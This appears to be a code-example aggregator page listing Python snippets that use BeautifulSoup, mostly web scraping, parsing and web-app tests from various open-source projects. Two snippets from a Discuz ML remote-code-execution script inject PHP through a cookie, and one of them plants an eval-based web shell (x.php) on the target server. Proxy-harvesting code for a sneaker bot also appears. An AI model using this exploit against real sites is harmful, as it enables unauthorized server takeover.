Python Examples of bs4.BeautifulSoup

Source File: start.py From Starx_Pixiv_Collector with MIT License

10 votes

def get_pixiv_user_name():
    global login_status
    tag = 'Get_Pixiv_User_Name'
    # Check if cookies works.
    pixiv_www_url = 'https://www.pixiv.net/'
    check_soup = BeautifulSoup(get_text_from_url(pixiv_www_url), 'html.parser')
    try:
        pixiv_user_nick_name = check_soup.find(name='a', attrs={'class': 'user-name js-click-trackable-later'}).string
        print_with_tag(tag, ['Login as', pixiv_user_nick_name])
    except Exception as e:
        print_with_tag(tag,['Error:',e])
        login_status = False
        print_with_tag(tag,'Failed to check the user name.')
        print_with_tag(tag,'Might be the cookies is out of the date?')
    else:
        login_status = True
        print_with_tag(tag,'Login success!')

#

Source File: gitgot.py From GitGot with GNU Lesser General Public License v3.0

7 votes

def gist_fetch(query, page_idx, total_items=1000):
    gist_url = "https://gist.github.com/search?utf8=%E2%9C%93&q={}&p={}"
    query = urllib.parse.quote(query)
    gists = []

    try:
        resp = requests.get(gist_url.format(query, page_idx))
        soup = bs4.BeautifulSoup(resp.text, 'html.parser')
        total_items = min(total_items, int(
            [x.text.split()[0] for x in soup.find_all('h3')
                if "gist results" in x.text][0].replace(',', '')))
        gists = [x.get("href") for x in soup.findAll(
                            "a", class_="link-overlay")]
    except IndexError:
        return {"data": None, "total_items": 0}

    return {"data": gists, "total_items": total_items}

Source File: universal.py From xalpha with MIT License

7 votes

def get_rt_from_ft(code, _type="indices"):
    url = make_ft_url(code, _type=_type)
    r = rget(url)
    b = BeautifulSoup(r.text, "lxml")
    d = {}
    d["name"] = b.find("h1").string
    d["current"] = _float(b.find("span", class_="mod-ui-data-list__value").string)
    d["percent"] = _float(
        b.select("span[class^='mod-format--']")[0].text.split("/")[-1].strip()[:-1]
    )
    d["current_ext"] = None
    d["market"] = None
    d["currency"] = b.find("span", class_="mod-ui-data-list__label").string.split("(")[
        1
    ][:-1]
    d["time"] = b.find("div", class_="mod-disclaimer").string
    return d

Source File: misc.py From xalpha with MIT License

7 votes

def get_tdx_holidays(holidays=None, format="%Y-%m-%d"):
    r = rget("https://www.tdx.com.cn/url/holiday/")
    r.encoding = "gbk"
    b = BeautifulSoup(r.text, "lxml")
    l = b.find("textarea").string.split("\n")
    if not holidays:
        holidays = {}
    for item in l:
        if item.strip():
            c = item.split("|")
            if c[2] in region_trans:
                rg = region_trans[c[2]]
                tobj = dt.datetime.strptime(c[0], "%Y%m%d")
                tstr = tobj.strftime(format)
                if rg not in holidays:
                    holidays[rg] = [tstr]
                else:
                    holidays[rg].append(tstr)
    return holidays

Source File: test_exceptions_handler.py From sanic with MIT License

7 votes

def test_chained_exception_handler():
    request, response = exception_handler_app.test_client.get(
        "/6/0", debug=True
    )
    assert response.status == 500

    soup = BeautifulSoup(response.body, "html.parser")
    html = str(soup)

    assert "response = handler(request, *args, **kwargs)" in html
    assert "handler_6" in html
    assert "foo = 1 / arg" in html
    assert "ValueError" in html
    assert "The above exception was the direct cause" in html

    summary_text = " ".join(soup.select(".summary")[0].text.split())
    assert (
        "ZeroDivisionError: division by zero while handling path /6/0"
    ) == summary_text

Source File: dz-ml-rce.py From discuz-ml-rce with MIT License

7 votes

def dz_ml_rce_check(tgtUrl, setcookie_language_value, timeout):

    tgtUrl = tgtUrl
    check_payload = setcookie_language_value + '\'.phpinfo().\';'
    headers = {}

    headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36";
    headers["Cookie"] = check_payload;

    check_rsp = requests.get(tgtUrl,headers=headers,timeout=timeout,verify=False)
    #print headers['Cookie']
    if check_rsp.status_code == 200:
        try:
            if (check_rsp.text.index('PHP Version')):
                print 'target is vulnerable!!!'

            else:
                soup = BeautifulSoup(check_rsp.text, 'lxml')
                if (soup.find('title')):
                    print 'target seem not vulnerable-' + 'return title: ' + str(soup.title.string) + '\n'
        except ValueError, e:
                print 'target seem not vulnerable-' + e.__repr__()
        except:

Source File: test_admin_forms.py From comport with BSD 3-Clause "New" or "Revised" License

6 votes

def test_edit_and_preview_links_on_schema_preview_page(self, testapp):
        department = Department.create(name="Metropolis Police Department", short_name="MPD", load_defaults=True)

        # set up a user
        create_and_log_in_user(testapp, department)

        # make a request to specific front page
        for page in ['complaints', 'useofforce', 'ois', 'assaultsonofficers']:

            response = testapp.get("/department/{}/preview/schema/{}".format(department.id, page))
            assert response.status_code == 200
            soup = BeautifulSoup(response.text, "html.parser")
            assert soup.find("a", href="/department/{}/edit/schema/{}".format(department.id, page)) is not None
            assert soup.find("a", href="/department/{}".format(department.id)) is not None

Source File: start.py From Starx_Pixiv_Collector with MIT License

6 votes

def get_illust_infos_from_illust_url(url):
    data_dict = {}
    illust_url_content = get_text_from_url(url)
    # illust_url_content.encoding = 'unicode_escape'
    new_soup = BeautifulSoup(illust_url_content,'html.parser')
    json_data = new_soup.find(name='meta',attrs={'name':'preload-data'}).attrs['content']
    format_json_data = demjson.decode(json_data)
    pre_catch_id = list(format_json_data['illust'].keys())[0]
    illust_info = format_json_data['illust'][pre_catch_id]
    # get each value
    data_dict['illustId'] = illust_info['illustId']
    data_dict['illustTitle'] = illust_info['illustTitle']
    data_dict['illustComment'] = illust_info['illustComment']
    data_dict['createDate'] = illust_info['createDate']
    data_dict['illustType'] = illust_info['illustType']
    data_dict['urls'] = illust_info['urls']
    # data_dict['tags']=illust_info['tags']
    data_dict['userId'] = illust_info['userId']
    data_dict['userName'] = illust_info['userName']
    data_dict['userAccount'] = illust_info['userAccount']
    data_dict['likeData'] = illust_info['likeData']
    data_dict['width'] = illust_info['width']
    data_dict['height'] = illust_info['height']
    data_dict['pageCount'] = illust_info['pageCount']
    data_dict['bookmarkCount'] = illust_info['bookmarkCount']
    data_dict['likeCount'] = illust_info['likeCount']
    data_dict['commentCount'] = illust_info['commentCount']
    data_dict['viewCount'] = illust_info['viewCount']
    data_dict['isOriginal'] = illust_info['isOriginal']
    per_tags = illust_info['tags']['tags']
    tags_list = []
    for tag in range(len(per_tags)):
        tags_list.append(per_tags[tag]['tag'])
    data_dict['tags'] = tags_list
    ###########################################################
    update_database(data_dict['illustId'], data_dict['illustTitle'], data_dict['illustType'], data_dict['userId'],
                    data_dict['userName'], data_dict['tags'], data_dict['urls'])
    return data_dict

Source File: ebay-watcher.py From ebay-watcher with MIT License

6 votes

def watch(self):
        '''
        () -> None
        Attempts to watch a product on eBay.
        '''
        # Get product watch link
        try:
            r = self.s.get(self.product_link, proxies=get_proxy(self.proxy_list), verify=False)
        except:
            try:
                r = self.s.get(self.product_link, proxies=get_proxy(self.proxy_list), verify=False)
            except:
                log('e', "Connection failed while loading product on " + self.product_link)
                return

        try:
            watch_link = soup(r.text, "html.parser").find("div", {"id": "vi-atl-lnk"}).a["href"]
        except:
            log('e', "Connection failed while loading product on " + self.product_link)
            return
            
        # Watch the product (the second GET actually adds it to watch list)
        try:
            r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False)
            r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False)   
        except:
            try:
                r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False)
                r = self.s.get(watch_link, proxies=get_proxy(self.proxy_list), verify=False)   
            except:
                log('e', "Failed to add " + self.product_link + " to watch list.")
                return
                

        # Alert user of progress: Watch product success/failure
        if("saved in your" in r.text.lower()):
            log('s', "Added " + self.product_link + " to watch list.")
        else:
            log('e', "Couldn't add " + self.product_link + " to watch list.")

Source File: google.py From fireprox with GNU General Public License v3.0

6 votes

def check_query(count, url, query):
	if url[-1] == '/':
		url = url[:-1]

	url = f'{url}/search?q={query}&start={count}&num=100'
	headers = {
		'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0',
	}
	results = requests.get(url, headers=headers)

	soup = BeautifulSoup(results.text, 'lxml')

	with add_lock:
		idx = 1
		for g in soup.find_all('div', class_='r'):
			link = g.find_all('a')[0]['href']
			title = g.find_all('h3')[0]
			item = f'{title.text} ({link})'
			search_results.add(item)
			idx+=1

Source File: bing.py From fireprox with GNU General Public License v3.0

6 votes

def check_query(count, url, query):
	if url[-1] == '/':
		url = url[:-1]

	url = f'{url}/search?q={query}&first={count}'
	headers = {
		'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0',
	}
	results = requests.get(url, headers=headers)

	soup = BeautifulSoup(results.text, 'lxml')

	with add_lock:
		idx = 1
		for g in soup.find_all('li', class_='b_algo'):
			result = g.find('h2')
			link = result.find('a')['href']
			title = result.text
			item = f'{title} ({link})'
			search_results.add(item)
			idx+=1

Source File: test_admin_forms.py From comport with BSD 3-Clause "New" or "Revised" License

6 votes

def test_edit_and_preview_links_on_department_admin_page(sefl, testapp):
        ''' There are links to preview & edit main and schema pages from the department admin page.
        '''
        department = Department.create(name="B Police Department", short_name="BPD", load_defaults=True)

        # set up a user
        create_and_log_in_user(testapp, department)

        # make a request to specific front page
        response = testapp.get("/department/{}".format(department.id))
        assert response.status_code == 200
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="{}/preview/useofforce".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/complaints".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/ois".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/pursuits".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/assaultsonofficers".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/useofforce".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/complaints".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/ois".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/pursuits".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/assaultsonofficers".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/schema/useofforce".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/schema/complaints".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/schema/ois".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/schema/pursuits".format(department.id)) is not None
        assert soup.find("a", href="{}/preview/schema/assaultsonofficers".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/schema/useofforce".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/schema/complaints".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/schema/ois".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/schema/pursuits".format(department.id)) is not None
        assert soup.find("a", href="{}/edit/schema/assaultsonofficers".format(department.id)) is not None

Source File: universal.py From xalpha with MIT License

6 votes

def get_portfolio_fromttjj(code, start=None, end=None):
    startobj = dt.datetime.strptime(start, "%Y%m%d")
    endobj = dt.datetime.strptime(end, "%Y%m%d")
    if (endobj - startobj).days < 90:
        return None  # note start is always 1.1 4.1 7.1 10.1 in incremental updates
    if code.startswith("F"):
        code = code[1:]
    r = rget("http://fundf10.eastmoney.com/zcpz_{code}.html".format(code=code))
    s = BeautifulSoup(r.text, "lxml")
    table = s.find("table", class_="tzxq")
    df = pd.read_html(str(table))[0]
    df["date"] = pd.to_datetime(df["报告期"])
    df["stock_ratio"] = df["股票占净比"].replace("---", "0%").apply(lambda s: _float(s[:-1]))
    df["bond_ratio"] = df["债券占净比"].replace("---", "0%").apply(lambda s: _float(s[:-1]))
    df["cash_ratio"] = df["现金占净比"].replace("---", "0%").apply(lambda s: _float(s[:-1]))
    #     df["dr_ratio"] = df["存托凭证占净比"].replace("---", "0%").apply(lambda s: xa.cons._float(s[:-1]))
    df["assets"] = df["净资产（亿元）"]
    df = df[::-1]
    return df[["date", "stock_ratio", "bond_ratio", "cash_ratio", "assets"]]


# this is the most elegant approach to dispatch get_daily, the definition can be such simple
# you actually don't need to bother on start end blah, everything is taken care of by ``cahcedio``

Source File: test_admin_forms.py From comport with BSD 3-Clause "New" or "Revised" License

6 votes

def test_edit_and_preview_links_on_preview_page(self, testapp):
        department = Department.create(name="Metropolis Police Department", short_name="MPD", load_defaults=True)

        # set up a user
        create_and_log_in_user(testapp, department)

        # make a request to specific front page
        for page in ['index', 'complaints', 'useofforce', 'ois', 'assaultsonofficers']:

            response = testapp.get("/department/{}/preview/{}".format(department.id, page))
            assert response.status_code == 200
            soup = BeautifulSoup(response.text, "html.parser")
            assert soup.find("a", href="/department/{}/edit/{}".format(department.id, page)) is not None
            assert soup.find("a", href="/department/{}".format(department.id)) is not None

Source File: Extractor.py From News-At-Command-Line with MIT License

6 votes

def ExtractionAlgo(self,text):
        soup=BeautifulSoup(text,'html.parser')
        title=soup.title.string
        Result=[]
        #print soup
        maincontent=soup.find_all("div", class_="content__article-body from-content-api js-article__body")
        #print maincontent
        for content in maincontent:
            scripttags=content.find_all(["script","br","figure","image"])
            for scripttag in scripttags:
                scripttag.extract()
            #print content.text
            for foundcontent in content.find_all("p"):
                Result.append(foundcontent.text)
        Result=''.join(Result)
        return (title,Result)

Source File: Extractor.py From News-At-Command-Line with MIT License

6 votes

def ExtractionAlgo(self,text):
        soup=BeautifulSoup(text,'html.parser')
        title=soup.title.string
        Result=[]
        #print soup
        maincontent=soup.find_all("div", class_="article")
        #print maincontent
        for content in maincontent:
            scripttags=content.find_all(["script","br","figure","image","span"])
            for scripttag in scripttags:
                scripttag.extract()
            #print content.text
            for foundcontent in content.find_all("p"):
                Result.append(foundcontent.text)
        Result=''.join(Result)
        return (title,Result)

Source File: Extractor.py From News-At-Command-Line with MIT License

6 votes

def ExtractionAlgo(self,text):
        soup=BeautifulSoup(text,'html.parser')
        title=soup.title.string
        Result=[]
        #print soup
        maincontent=soup.find_all("div", class_="Normal")
        #print maincontent
        for content in maincontent:
            #print content.text
            Result.append(content.text)
        Result=''.join(Result)
        return (title,Result)

Source File: views.py From MPContribs with MIT License

6 votes

def export_notebook(nb, cid):
    nb = nbformat.from_dict(nb)
    html_exporter = HTMLExporter()
    html_exporter.template_file = "basic"
    body = html_exporter.from_notebook_node(nb)[0]
    soup = BeautifulSoup(body, "html.parser")
    # mark cells with special name for toggling, and
    # TODO make element id's unique by appending cid (for ingester)
    for div in soup.find_all("div", "output_wrapper"):
        script = div.find("script")
        if script:
            script = script.contents[0]
            if script.startswith("render_json"):
                div["name"] = "HData"
            elif script.startswith("render_table"):
                div["name"] = "Tables"
            elif script.startswith("render_plot"):
                div["name"] = "Graphs"
        else:
            pre = div.find("pre")
            if pre and pre.contents[0].startswith("Structure"):
                div["name"] = "Structures"
    # name divs for toggling code_cells
    for div in soup.find_all("div", "input"):
        div["name"] = "Code"
    # separate script
    script = []
    for s in soup.find_all("script"):
        script.append(s.string)
        s.extract()  # remove javascript
    return soup.prettify(), "\n".join(script)

Source File: Extractor.py From News-At-Command-Line with MIT License

6 votes

def TextExtractionAlgo(self,text,htmlelement,classname):
        soup=BeautifulSoup(text,'html.parser')
        title=soup.title.string
        Result=[]
        #print soup
        maincontent=soup.find_all(htmlelement, class_=classname)
        #print maincontent
        for content in maincontent:
            scripttags=content.find_all(["script","br","figure","image"])
            for scripttag in scripttags:
                scripttag.extract()
            #print content.text
            Result.append(content.text)
        Result=''.join(Result)
        return (title,Result)

Source File: test_public_pages.py From comport with BSD 3-Clause "New" or "Revised" License

6 votes

def test_about_page_exists(self, testapp):
        response = testapp.get("/about/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="https://www.codeforamerica.org") is not None

Source File: test_public_pages.py From comport with BSD 3-Clause "New" or "Revised" License

6 votes

def test_non_public_depts_display_for_users_with_access(self, testapp):
        ''' Users can see links to datasets they're allowed to access on the front page
        '''
        impd = Department.create(name="I Police Department", short_name="IMPD", is_public=True)
        UseOfForceIncidentIMPD.create(department_id=impd.id, opaque_id="12345abcde")
        bpd = Department.create(name="B Police Department", short_name="BPD", is_public=False)
        UseOfForceIncidentBPD.create(department_id=bpd.id, opaque_id="12345abcde")
        lmpd = Department.create(name="LM Police Department", short_name="LMPD", is_public=False)
        UseOfForceIncidentLMPD.create(department_id=lmpd.id, opaque_id="12345abcde")

        # A non logged-in user can only see the public department
        response = testapp.get("/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/department/IMPD/useofforce") is not None
        assert soup.find("a", href="/department/BPD/useofforce") is None
        assert soup.find("a", href="/department/LMPD/useofforce") is None

        # A user associated with a particular department can see that department's
        # available datasets when logged in
        create_and_log_in_user(testapp=testapp, department=bpd, username="user1")
        response = testapp.get("/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/department/IMPD/useofforce") is not None
        assert soup.find("a", href="/department/BPD/useofforce") is not None
        assert soup.find("a", href="/department/LMPD/useofforce") is None

        # A user with admin access can see all departments' available datasets
        create_and_log_in_user(testapp=testapp, department=impd, rolename='admin', username="user2")
        response = testapp.get("/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/department/IMPD/useofforce") is not None
        assert soup.find("a", href="/department/BPD/useofforce") is not None
        assert soup.find("a", href="/department/LMPD/useofforce") is not None

        # Log out and only the public department should be visible
        testapp.get(url_for('public.logout')).follow()
        response = testapp.get("/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/department/IMPD/useofforce") is not None
        assert soup.find("a", href="/department/BPD/useofforce") is None
        assert soup.find("a", href="/department/LMPD/useofforce") is None

Source File: misc.py From xalpha with MIT License

6 votes

def get_ri_status(suburl=None):
    if not suburl:
        suburl = "m=cb&a=cb_all"  # 可转债

    url = "http://www.richvest.com/index.php?"
    url += suburl
    r = rget(url, headers={"user-agent": "Mozilla/5.0"})
    b = BeautifulSoup(r.text, "lxml")
    cl = []
    for c in b.findAll("th"):
        cl.append(c.text)
    nocl = len(cl)
    rl = []
    for i, c in enumerate(b.findAll("td")):
        if i % nocl == 0:
            r = []
        r.append(c.text)
        if i % nocl == nocl - 1:
            rl.append(r)
    return pd.DataFrame(rl, columns=cl)

Source File: proxyLoader.py From premeStock with MIT License

6 votes

def filterConnections(proxiesList):
	workingProxies = []
	count = 0
	for proxy in proxiesList:
		count += 1
		cprint("Loading proxy # {}".format(count), "green")
		proxies = {
		  'http': proxy,
		  'https': proxy
		}
		try:
			r = requests.get("http://www.supremenewyork.com/shop/all", proxies=proxies, timeout=1)
			data = r.text
			soup = BeautifulSoup(data,"html.parser")
			headerCheck = str(soup.find("span",{"id":"time-zone-name"}).text)
			if headerCheck == "NYC":
				cprint(headerCheck, "blue")
				workingProxies.append(proxy)
				cprint("Added {}!".format(proxy),"green")
			else:
				cprint("Banned!", "red")
				raise
		except:
			cprint("Bad Proxy: {}".format(proxy), "red")
	return workingProxies

Source File: proxyLoader.py From premeStock with MIT License

6 votes

def site2(proxiesList):
	url = "https://www.us-proxy.org/"
	user = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"}
	r = requests.get(url,headers=user)

	data = r.text
	soup = BeautifulSoup(data,"html.parser")

	table = soup.find("tbody")
	for ips in table.find_all("tr"):
		count = 0
		proxy = ""
		for ip in ips.find_all("td"):
			if count == 0:
				proxy = str(ip.text)
				proxy += ":"
			if count == 1:
				proxy += str(ip.text)
				proxiesList.append(proxy)
				break;
			count += 1
	cprint("Succesfully added {} proxies!".format(len(proxiesList)), 'green')

Source File: universal.py From xalpha with MIT License

6 votes

def get_newest_netvalue(code):
    """
    防止天天基金总量 API 最新净值更新不及时，获取基金最新公布净值及对应日期, depracated, use get_rt("F501018") instead

    :param code: six digits string for fund.
    :return: netvalue, %Y-%m-%d
    """
    code = code[1:]
    r = rget("http://fund.eastmoney.com/{code}.html".format(code=code))
    s = BeautifulSoup(r.text, "lxml")
    return (
        float(
            s.findAll("dd", class_="dataNums")[1]
            .find("span", class_="ui-font-large")
            .string
        ),
        str(s.findAll("dt")[1]).split("(")[1].split(")")[0][7:],
    )

Source File: proxyLoader.py From premeStock with MIT License

6 votes

def site4(proxiesList):
	url = "https://www.proxynova.com/proxy-server-list/country-us/"
	user = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"}
	
	r = requests.get(url,headers=user)
	data = r.text
	soup = BeautifulSoup(data,"html.parser")

	proxy = ""
	# for ips in soup.find_all("tr",{"class":"spy1xx"}):
	for ips in soup.find_all("tr"):
		count = 0
		for ip in ips.find_all("td",{"align":"left"}):
			if count == 0:
				proxy = str(ip.get_text(strip=True).replace("document.write('","").replace("'","").replace("+","").replace(");","").replace(" ",""))
			if count == 1:
				proxy += ":"+str(ip.text).strip()
				proxiesList.append(proxy)
				break;
			count += 1

Source File: Self.py From CyberTK-Self with GNU General Public License v2.0

6 votes

def yt(query):
    with requests.session() as s:
         isi = []
         if query == "":
             query = "S1B tanysyz"   
         s.headers['user-agent'] = 'Mozilla/5.0'
         url    = 'http://www.youtube.com/results'
         params = {'search_query': query}
         r    = s.get(url, params=params)
         soup = BeautifulSoup(r.content, 'html5lib')
         for a in soup.select('.yt-lockup-title > a[title]'):
            if '&list=' not in a['href']:
                if 'watch?v' in a['href']:
                    b = a['href'].replace('watch?v=', '')
                    isi += ['youtu.be' + b]
         return isi

Source File: test_public_pages.py From comport with BSD 3-Clause "New" or "Revised" License

6 votes

def test_home_page_links_to_about(self, testapp):
        response = testapp.get("/", status=200)
        soup = BeautifulSoup(response.text, "html.parser")
        assert soup.find("a", href="/about/") is not None

Source File: dz-ml-rce.py From discuz-ml-rce with MIT License

5 votes

def dz_ml_rce_getshell(tgtUrl, setcookie_language_value, timeout):
    getshell_exp = '\'.file_put_contents%28%27x.php%27%2Curldecode%28%27%253c%253fphp%2520@eval%28%2524_%25%35%30%25%34%66%25%35%33%25%35%34%255b%2522x%2522%255d%29%253b%253f%253e%27%29%29.\';'
    getshell_exp_send = setcookie_language_value + getshell_exp

    headers = {}

    headers["User-Agent"] = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36";

    headers['Cookie'] = getshell_exp_send

    filename = tgtUrl.split('/')[-1]

    getshell_rsp = requests.get(tgtUrl, headers=headers, timeout=timeout, verify=False)
    # print headers['Cookie']
    if getshell_rsp.status_code == 200:
        getshell_rsp1 = requests.get(tgtUrl.split(filename)[0] + 'x.php', timeout=timeout, verify=False)
        #print tgtUrl.split('/')[-1]
        #print tgtUrl.split(filename)[0] + 'x.php'
        if (getshell_rsp1.status_code) == 200 and (getshell_rsp1.text == ""):
            print 'Getshell success!-shellPath:' + tgtUrl.split(filename)[0] + 'x.php'
        else:
            #soup = BeautifulSoup(getshell_rsp1.text, 'lxml')
            print 'Getshell failed!-rsp1 status code: ' + str(getshell_rsp1.status_code) + '\nrsp1 text: ' + getshell_rsp1.text[0:100]

    else:
        print 'Target seem not vulnerable-status code: ' + str(getshell_rsp.status_code) + '\n'

Source File: get_recipes.py From recipe-box with MIT License

5 votes

def get_all_recipes_epi(page_num):
    base_url = 'http://www.epicurious.com'
    search_url_str = 'search/?content=recipe&page'
    url = '{}/{}={}'.format(base_url, search_url_str, page_num)

    try:
        soup = BeautifulSoup(request.urlopen(
            request.Request(url, headers=HEADERS)).read(), "html.parser")
        recipe_link_items = soup.select('div.results-group article.recipe-content-card a.view-complete-item')
        recipe_links = [r['href'] for r in recipe_link_items]
        return {base_url + r: get_recipe(base_url + r) for r in recipe_links}
    except (HTTPError, URLError):
        print('Could not parse page {}'.format(url))
        return []

Python bs4.BeautifulSoup() Examples